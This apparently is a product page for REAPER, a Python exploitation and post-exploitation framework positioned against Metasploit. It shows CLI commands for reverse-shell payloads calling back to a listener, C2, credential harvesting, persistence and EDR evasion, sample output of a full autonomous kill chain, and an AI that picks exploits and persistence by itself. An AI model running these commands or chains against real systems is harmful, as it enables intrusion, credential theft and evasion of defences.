REAPER

Pure Python Exploit & Post-Exploitation Framework
The ghost found them. The reaper takes them. Zero Ruby. Pure Python.
9
Modules
5,267
Tests
55
CVE Exploits
24
Products
pip install red-specter-reaper
Docs
CVE EXPLOITS | REVERSE SHELLS | C2 SERVERS | IMPLANT DEPLOYMENT | PRIVILEGE ESCALATION | LATERAL MOVEMENT | PERSISTENCE | CREDENTIAL HARVESTING | EVASION | KILL CHAIN AUTOMATION | WRAITH INTEGRATION CVE EXPLOITS | REVERSE SHELLS | C2 SERVERS | IMPLANT DEPLOYMENT | PRIVILEGE ESCALATION | LATERAL MOVEMENT | PERSISTENCE | CREDENTIAL HARVESTING | EVASION | KILL CHAIN AUTOMATION | WRAITH INTEGRATION

Metasploit Is Ruby. Your Payloads Are PE/ELF. Your Toolchain Is Fragile.

The industry's exploit framework is written in Ruby, generates PE and ELF payloads that every EDR signatures on sight, and requires a 2GB install with dozens of dependencies. REAPER replaces the entire chain with pure Python. Python payloads. Python implants. Python C2. Harder to signature. Easier to extend. One pip install.

Ruby Dependency

Metasploit requires Ruby, PostgreSQL, and hundreds of gems. One broken gem and your framework is dead. REAPER is pure Python. One pip install. No Ruby. No PostgreSQL. No fragile dependency chains.

Signature Magnet

PE and ELF payloads from msfvenom are instantly flagged by every EDR on the planet. Python payloads are inherently harder to signature. No binary compilation. No fixed headers. No static patterns for AV to match.

No Integration

Metasploit doesn't know what your scanner found. You copy-paste CVE numbers manually. REAPER chains directly from WRAITH scan results. Vulnerability discovered to exploit delivered in one command.

No AI Orchestration

Traditional exploit frameworks don't reason about attack paths. NEMESIS orchestrates REAPER with AI reasoning. The Supreme Commander decides which exploit, which payload, which persistence method — based on the target environment.

The REAPER Armoury

Nine modules. Each one replaces a core Metasploit component with pure Python engineering. No Ruby. No msfvenom. No Meterpreter. Every exploit, every payload, every implant built from scratch. 5,267 tests. 55 CVE exploits across 24 products. Complete post-exploitation chain.

Module 01

Exploit

55 CVEs — 24 Products
Replaces: Metasploit exploit/*

55 CVE exploits across 24 products with protocol-level attacks. Buffer overflows, deserialization, authentication bypass, RCE. Every exploit pure Python. No Ruby modules.

Module 02

Payload

14 Shell Templates — 12 Stagers
Replaces: msfvenom

Reverse and bind shells over TCP, HTTP, HTTPS, and DNS. Staged and stageless variants. 6 output formats. Python payloads that EDR can't signature like PE/ELF binaries.

Module 03

C2

Multi-Protocol — Async Architecture
Replaces: multi/handler

Async multi-protocol C2 server with XOR encrypted sessions. TCP, HTTP, HTTPS, DNS channels. Full session management. Multiple simultaneous implant connections. Pure Python server.

Module 04

Implant

10 Capabilities — 2 Variants
Replaces: Meterpreter

Pure Python cross-platform agent with 10 capabilities. Full and minimal variants. File operations, process management, screenshot capture, keylogging, credential dump. No compiled binary required.

Module 05

Privesc

20 GTFOBins — 15 Linux — 10 LOLBAS
Replaces: local_exploit_suggester

20 GTFOBins entries for SUID/sudo exploitation. 15 Linux privilege escalation checks covering kernel, cron, capabilities, writable paths. 10 LOLBAS entries for Windows environments.

Module 06

Lateral

SSH/SMB Pivoting — SOCKS5 Proxy
Replaces: psexec / autoroute

SSH and SMB pivoting for lateral movement. Built-in SOCKS5 proxy for tunnelling traffic. Port forwarding. Credential reuse across compromised hosts. Network propagation without touching disk.

Module 07

Persist

10 Linux — 8 Windows Methods
Replaces: persistence modules

10 Linux persistence methods (cron, systemd, rc.local, bashrc, SSH keys, MOTD, udev, XDG autostart, APT hooks, LD_PRELOAD). 8 Windows methods. Install, verify, and remove. Stealth ratings per method.

Module 08

Harvest

35 Linux — 10 Windows Paths
Replaces: post/gather modules

35 Linux credential paths and 10 Windows credential paths. 25 secret regex patterns for API keys, tokens, passwords, connection strings. Automated credential extraction from compromised hosts.

Module 09

Evasion

14 Techniques — Polymorphic Engine
Replaces: encoders / evasion

XOR, AES, base64, and zlib encoding. Polymorphic engine that generates unique payload variants every execution. Sandbox detection for VM/debugger environments. 14 evasion techniques combined.

One Binary. Every Phase. Nine Commands.

Exploit a known CVE:

$ reaper exploit 192.168.1.50 --cve CVE-2024-21887

Generate a reverse shell payload:

$ reaper payload --type reverse_tcp --lhost 10.0.0.1 --lport 4444

Start a C2 server:

$ reaper c2 --lhost 0.0.0.0 --lport 4444 --protocol https

Generate a cross-platform implant:

$ reaper implant --generate --os linux

Check for privilege escalation vectors:

$ reaper privesc --os linux

Move laterally via SSH:

$ reaper lateral 192.168.1.51 --method ssh

Install persistence:

$ reaper persist --method cron

Harvest credentials from a compromised host:

$ reaper harvest --type credentials

Apply evasion to a payload:

$ reaper evasion --input payload.py --technique polymorphic

Full 9-phase kill chain — one command:

$ reaper engage 192.168.1.0/24 # full autonomous kill chain

Chain from WRAITH discovery:

$ reaper engage --wraith-report scan.json # exploit what WRAITH found
[ENGAGE] Loading WRAITH report — 23 hosts, 27 findings
[EXPLOIT] Matching CVEs to available exploits...
  CVE-2024-21887 matched — Ivanti Connect Secure RCE
  CVE-2023-44228 matched — Apache Struts RCE
[PAYLOAD] Generating reverse_tcp shell — HTTPS channel
  Payload generated — polymorphic evasion applied
[C2] Starting C2 server on 0.0.0.0:4444
  Session 1 established — 192.168.1.50 (Linux x86_64)
[IMPLANT] Deploying minimal implant...
  Implant active — 10 capabilities loaded
[PRIVESC] Checking escalation vectors...
  SUID find binary — GTFOBins match — root obtained
[HARVEST] Extracting credentials...
  12 credentials found — SSH keys, database passwords, API tokens
[LATERAL] Pivoting to adjacent hosts...
  3 new sessions via SSH credential reuse
[PERSIST] Installing persistence — cron + systemd
  Persistence verified — stealth rating: high
[EVASION] Cleaning artifacts, applying anti-forensics...

ENGAGE COMPLETE | 4 sessions | 2 exploits fired | 12 creds harvested | persistence installed

Pure Python

Zero Ruby. Zero msfvenom. Zero Meterpreter. Every exploit, payload, implant, and C2 server built from scratch in pure Python. One pip install replaces Metasploit.

WRAITH Chain

WRAITH discovers vulnerabilities. REAPER exploits them. One command chains discovery to exploitation. No copy-pasting CVE numbers between tools.

NEMESIS Orchestration

NEMESIS AI orchestrates REAPER operations. The Supreme Commander reasons about which exploit, which payload, which persistence method to use based on target context.

Evasion by Design

Python payloads are inherently harder to signature than PE/ELF binaries. Polymorphic engine generates unique variants. Sandbox detection. Anti-forensics built in.

Every Exploit. Every Payload. Every Technique. Catalogued.

REAPER ships with a comprehensive signature database covering CVE exploits, shell templates, privilege escalation vectors, credential paths, persistence methods, and evasion techniques. Every entry tested. Every technique validated. 5,267 tests confirm it all works.

55
CVE Exploits
24
Products Covered
14
Shell Templates
12
Stager Templates
20
GTFOBins
15
Linux Privesc Checks
10
LOLBAS Entries
35
Linux Credential Paths
10
Windows Credential Paths
25
Secret Patterns
10
Linux Persistence
8
Windows Persistence
14
Evasion Techniques
10
Implant Capabilities
9
Modules
5,267
Tests
55
CVE Exploits
v1.0.0
Version
Unleashed Mode

Standard Mode Analyses. UNLEASHED Mode Executes.

Standard mode generates exploits, payloads, and attack plans but never sends them. Dry-run mode proves they work without delivering. UNLEASHED live mode executes the full kill chain against real targets. Ed25519 key gate required. Two flags must be passed. This is not accidental.

Capability Standard Unleashed
Exploit Detection & analysis only Fire exploits against targets
Payload Generate payload files Deliver and execute on target
C2 Simulate C2 protocol Full async C2 with live sessions
Implant Generate implant binary Deploy and activate on target
Privesc Enumerate vectors Execute escalation to root/SYSTEM
Lateral Map pivot paths SSH/SMB pivot with credential reuse
Persist List available methods Install, verify, and maintain persistence
Harvest Identify credential locations Extract and exfiltrate credentials
Evasion Preview transformations Polymorphic + sandbox evasion live

Ed25519 Gate

UNLEASHED mode requires an Ed25519 private key at ~/.redspecter/override_private.pem and the --override --confirm-destroy flags. Without both, REAPER operates in detection and generation mode — building exploits and payloads without delivering them. The gate is cryptographic. There is no bypass. One key. One operator. Founder's machine only.

WRAITH Discovers. REAPER Exploits. NEMESIS Orchestrates.

WRAITH finds the vulnerabilities. REAPER exploits them, deploys an implant, harvests credentials, moves laterally, and persists. NEMESIS orchestrates the entire chain with AI reasoning. From discovery to full compromise — one pipeline. No manual steps.

Phase 1
Discover
WRAITH scans infrastructure. Finds open ports, services, web vulns, CVEs.
Phase 2
Exploit
REAPER matches CVEs to exploits. Fires protocol-level attacks against confirmed vulnerabilities.
Phase 3
Payload
Generates evasion-wrapped Python payload. Reverse shell over encrypted channel. No PE/ELF.
Phase 4
C2
Async C2 server catches callback. XOR encrypted session established. Full control.
Phase 5
Implant
Pure Python implant deployed. 10 capabilities active. Cross-platform. No binary on disk.
Phase 6
Privesc
GTFOBins and kernel checks. SUID exploitation. Escalate from user to root.
Phase 7
Harvest
Extract SSH keys, database passwords, API tokens. 25 secret regex patterns applied.
Phase 8
Lateral
SSH/SMB pivoting with harvested credentials. SOCKS5 proxy. Network propagation.
Phase 9
Persist
Install persistence across all compromised hosts. Cron, systemd, SSH keys. Stealth rated.

WRAITH → REAPER

Discovery to Exploitation

WRAITH scan results feed directly into REAPER. CVEs discovered by WRAITH are matched to REAPER exploits automatically. One command: reaper engage --wraith-report scan.json

REAPER → NEMESIS

Exploitation to Orchestration

NEMESIS AI orchestrates REAPER operations. The Supreme Commander reasons about attack paths, selects exploits, chooses persistence methods, and coordinates lateral movement across the network.

REAPER → AI Shield

Exploitation to Defence

Every exploit fired, every persistence method installed, every credential path checked — generates AI Shield blocking rules. Red team findings become blue team defences automatically.

Full Pipeline

13 Tools — Every Layer

FORGE tests the model. ARSENAL tests the agent. WRAITH scans the infrastructure. REAPER exploits it. NEMESIS orchestrates. AI Shield defends. Thirteen tools. Every layer. Nothing assumed safe.

Pure Engineering
Zero Ruby. Zero msfvenom. Zero Meterpreter.

Metasploit is a Ruby framework that generates PE and ELF payloads every EDR signatures on sight. REAPER is pure Python engineering. Every exploit engine, every payload generator, every C2 server, every implant written from scratch. Python payloads are inherently harder to signature. One pip install replaces the entire Metasploit toolchain.

9
Modules
55
CVE Exploits
5,267
Tests
0
Lines of Ruby

Thirteen Tools. Every Layer. No Gaps.

REAPER is Tool 13 in the Red Specter offensive pipeline. It exploits what WRAITH discovers. Findings feed into NEMESIS for AI-orchestrated attack chains and AI Shield for runtime defence generation.

Tool 1 — LLM
FORGE
Test the model
Tool 2 — Agent
ARSENAL
Test the AI agent
Tool 3 — Swarm
PHANTOM
Coordinated agent assault
Tool 4 — Web
POLTERGEIST
Test the web layer
Tool 5 — Traffic
GLASS
Watch the wire
Tool 6 — Adversarial
NEMESIS
Think like the attacker
Tool 7 — Human
SPECTER SOCIAL
Target the human
Tool 8 — OS/Kernel
PHANTOM KILL
Own the foundation
Tool 9 — Physical
GOLEM
Attack the physical layer
Tool 10 — Supply Chain
HYDRA
Attack the trust chain
Tool 11 — Operator
SCREAMER
Blind the operator
Tool 12 — Infrastructure
WRAITH
The ghost in the wire
Tool 13 — Exploitation
REAPER
The reaper takes them
Discovery & Governance
IDRIS
Discovery & governance
Defence Layer
AI SHIELD
Defend everything above
SIEM Integration
redspecter-siem
Enterprise SIEM correlation

Security Distros & Package Managers

Kali Linux
.deb package
Parrot OS
.deb package
BlackArch
PKGBUILD
PyPI
pip install
Debian
.deb package
Docker
docker-compose

The Ghost Found Them. The Reaper Takes Them.

WRAITH discovers the vulnerabilities. REAPER exploits them. Pure Python. Zero Ruby. Nine modules. Complete post-exploitation chain. From discovery to persistence in one pipeline.